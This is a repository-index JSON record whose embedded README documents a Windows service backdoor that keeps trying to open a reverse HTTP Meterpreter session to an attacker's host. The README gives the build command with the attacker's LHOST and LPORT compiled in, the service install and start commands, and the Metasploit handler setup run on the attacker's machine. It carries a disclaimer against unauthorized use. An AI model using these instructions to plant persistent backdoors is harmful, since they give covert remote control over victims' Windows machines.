{"id":18775907,"url":"https://github.com/mauri870/powershell-reverse-http","last_synced_at":"2025-04-13T09:31:30.684Z","repository":{"id":41506646,"uuid":"65909788","full_name":"mauri870/powershell-reverse-http","owner":"mauri870","description":":innocent: A Powershell exploit service that opens a reverse http connection via meterpreter","archived":false,"fork":false,"pushed_at":"2023-02-25T07:22:10.000Z","size":10,"stargazers_count":116,"open_issues_count":5,"forks_count":50,"subscribers_count":13,"default_branch":"master","last_synced_at":"2023-11-07T17:14:56.121Z","etag":null,"topics":["metasploit-framework","meterpreter","service","windows"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mauri870.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-08-17T13:28:34.000Z","updated_at":"2023-09-09T21:48:25.000Z","dependencies_parsed_at":"2022-08-29T16:00:14.269Z","dependency_job_id":null,"html_url":"https://github.com/mauri870/powershell-reverse-http","commit_stats":null,"previous_names":[],"tags_count":0,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauri870%2Fpowershell-reverse-http","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauri870%2Fpowershell-reverse-http/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauri870%2Fpowershell-reverse-http/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauri870%2Fpowershell-reverse-http/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mauri870","download_url":"https://codeload.github.com/mauri870/powershell-reverse-http/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223580080,"owners_count":17168562,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["metasploit-framework","meterpreter","service","windows"],"created_at":"2024-11-07T19:44:15.474Z","updated_at":"2024-11-07T19:44:16.076Z","avatar_url":"https://github.com/mauri870.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Powershell Reverse Http\n\n\u003e Note: Use this program at your own risk. I do not encourage in any way the use of this software illegally or to attack targets without their previous authorization\n\n\u003e Meterpreter-like backdoors are a pretty common attack vector and most decent antiviruses detect this behavior as a virus.\n\nA simple windows service running on background that connects with a meterpreter session via http.\n\n### Usage\nFirst, you need [go](https://golang.org/dl/) for build the binary (duh!) and [metasploit-framework](https://github.com/rapid7/metasploit-framework) to accept the reverse connection:\n\n```\ngit clone https://github.com/mauri870/powershell-reverse-http.git\ncd powershell-reverse-http\nenv GOOS=windows go build -ldflags \"-X main.LHOST=10.10.10.2 -X main.LPORT=3000\" -o powershell-reverse.exe\n```\n\nChange the LPORT and LHOST to match your metasploit handler\n\n## Usage\n```\npowershell-reverse.exe\nno command specified\n\nusage: powershell-reverse.exe \u003ccommand\u003e\n       where \u003ccommand\u003e is one of\n       install, remove, debug, start, stop, restart, pause or continue.\n```\n\nAfter install and start, the service is always up and trying to connect on host and port specified on `exploit.go`\n\nOn the attacker's machine:\n\n```\n./msfconsole --quiet\nmsf \u003e use exploit/multi/handler\nmsf exploit(handler) \u003e set payload windows/meterpreter/reverse_http\npayload =\u003e windows/meterpreter/reverse_http\nmsf exploit(handler) \u003e set LHOST YOUR_IP_ADDRESS_HERE\nLHOST =\u003e YOUR_IP_ADDRESS_HERE\nmsf exploit(handler) \u003e set LPORT YOUR_PORT_TO_AWAIT_CONNECTION_HERE\nLPORT =\u003e YOUR_PORT_TO_AWAIT_CONNECTION_HERE\nmsf exploit(handler) \u003e exploit\n\n[*] Started HTTP reverse handler on http://LHOST:LPORT\n[*] Starting the payload handler... \n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmauri870%2Fpowershell-reverse-http","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmauri870%2Fpowershell-reverse-http","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmauri870%2Fpowershell-reverse-http/lists"}